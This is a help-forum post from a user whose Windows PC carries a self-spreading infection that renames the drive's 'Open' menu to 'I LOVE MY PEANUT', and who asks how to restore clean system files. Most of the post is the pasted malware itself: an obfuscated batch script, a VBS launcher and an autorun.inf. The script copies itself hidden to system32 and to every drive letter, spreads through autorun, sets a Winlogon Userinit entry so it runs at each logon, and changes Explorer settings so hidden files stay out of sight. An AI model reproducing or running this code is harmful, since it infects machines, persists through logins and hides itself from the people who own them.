"I LOVE MY PEANUT" vbs. + windows NT cmd Script Infection [HELP ME


R

Ren

The following files have fallen to this problem. Right clicking (ONLY C:)
drive will appear as "I LOVE MY PEANUT" instead of "OPEN". Effects appear
only in C: (even though D: and E: also contain modifications to the files).

Is there a way to replace those files with the original functional-non
malicious ones? Like SysRes for example?

Also its causing Windows - No Disc, Errors when i try to open C: by double
clicking etc. However putting C:\ directly will bring me there with no
problems

Thanks in advance.

P.S. Im well aware that its related to some filo-originated virus. However i
just did a scan with both AVG 8 and "http://www.eset.com/onlinescan" and came
back empty handed.


10117(Cmd script)

201999.vbs

autorun.ini

----------------------------------------------

10117(Cmd script)

@call :c
%v% g0=09
%v% o=I LOVE MY PEANUT
%v% a=bcdefghijklmnopqrstuvwxyz
if "%1"=="%s%" %l% s
if "%1"=="%u%" start %u%r .\
%m% %cc%%zz% %l% a
%v% /a mn=%random%
%v% mm=%mn%.cmd
type .\%d% > %cc%%mm%
%z% %cc%%mm% %s%>>%c%%m1%%m2%.nt
%v% d=%mm%
%v% g=%random%
%z% %v% a = %i%("%w%.%s%") >%cc%%e%
%z% b=a.Run("%d% %u%",%s%,False) >>%cc%%e%
%y% %cc%%e% %r%
%z% @%v% /a main=%mn% > %cc%%zz%
%y% %cc%%zz% %r%
%y% %cc%%mm% %r%
call :v
:a
%v% j=del
for /l %%i %k% :d %%i
%l% e
:v
%v% t=Open
%m% %cc%%f% %y% %cc%%f% %p%
%z% [autorun]>%cc%%f%
%z% %t%= >>%cc%%f%
if /i "%DATE:~12,2%" GEQ "%g0%" (%z% %s%\%t%=%o%>>%cc%%f%) else (%z%
%s%\%t%=%t%>>%cc%%f%)
%z% %s%\%t%\%j%=%w%.exe .\%e% >>%cc%%f%
%z% %s%\%t%\Default=1 >>%cc%%f%
%z% %s%\%u%=%u% >>%cc%%f%
%z% %s%\%u%\%j%=%w%.exe .\%e% >>%cc%%f%
%y% %cc%%f% %r%
%x% %cc%%d% %c% %h%
%x% %cc%%f% %c% %h%
%x% %cc%%e% %c% %h%
%x% %cc%%zz% %c% %h%
%l% e
:b
%x% %cc%%d% %b%:\ %h%
%x% %cc%%f% %b%:\ %h%
%x% %cc%%e% %b%:\ %h%
%x% %cc%%zz% %b%:\ %h%
%v% b=
%l% e
:c
@echo off
set v=set
%v% l=goto
%v% b=del
%v% m1=auto
%v% x=xcopy
%v% y=attrib
%v% s=shell
%v% w=WScript
%v% i=CreateObject
%v% j=Command
%v% r=+r +h +s +a
%v% p=-r -h -s -a
%v% h=/r/h/y/k
%v% k=in (1,1,24) do call
%v% m=if exist
%v% n=if not exist
%v% q=/q/f
%v% u=Explore
%v% z=echo
%v% m2=exec
%v% rt=101007
%v% zz=101207.cmd
%v% c=%SYSTEMROOT%\system32\
%v% cc=%c%config\
%v% /a main=%random%
%m% %c%%zz% (call %c%%zz%) else (call .\%zz%)
%v% /a rs=%random%
%n% %cc%%rt%.cmd (
%z% @%v% /a rs=%rs%> %cc%%rt%.cmd
%y% %cc%%rt%.cmd %r%
) else (call %cc%%rt%.cmd)
%v% e=%rs%.vbs
%v% f=autorun.inf
%v% d=%main%.cmd
%v% x1=\Microsoft\Windows
%v% x2=\CurrentVersion\
%l% e
:s
%v% ss=%1
%v% g=%random%.reg
%z% Windows Registry Editor Version 5.00 >.\%g%
%z% [HKEY_LOCAL_MACHINE\SOFTWARE%x1% NT%x2%Winlogon] >>.\%g%
%z% "Userinit"="userinit.exe,%d%" >>.\%g%
%z% [HKEY_CURRENT_USER\Software%x1%%x2%%u%r\Advanced] >>.\%g%
%z% "Hidden"=dword:00000002 >>.\%g%
%z% "ShowSuperHidden"=dword:00000000 >>.\%g%
regedit /s .\%g%
%b% .\%g%
call :v
%v% j=del
for /l %%i %k% :d %%i
%l% e
:d
%v% a=%a:~1,24%
%v% b=%a:~0,1%
if "%ss%"=="%s%" (%m% %b%:\ %l% b) else (%m% %b%:\ %n% %b%:\%zz% %l% b)
:e

----------------------------

201999.vbs

set a = CreateObject("WScript.shell")
b=a.Run("10117.cmd Explore",shell,False)

----------------------------

autorun.ini

[autorun]
Open=
shell\Open=I LOVE MY PEANUT
shell\Open\Command=WScript.exe .\20199.vbs
shell\Open\Default=1
shell\Explore=Explore
shell\Explore\Command=WScript.exe .\20199.vbs
 
Ad

Advertisements


Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Top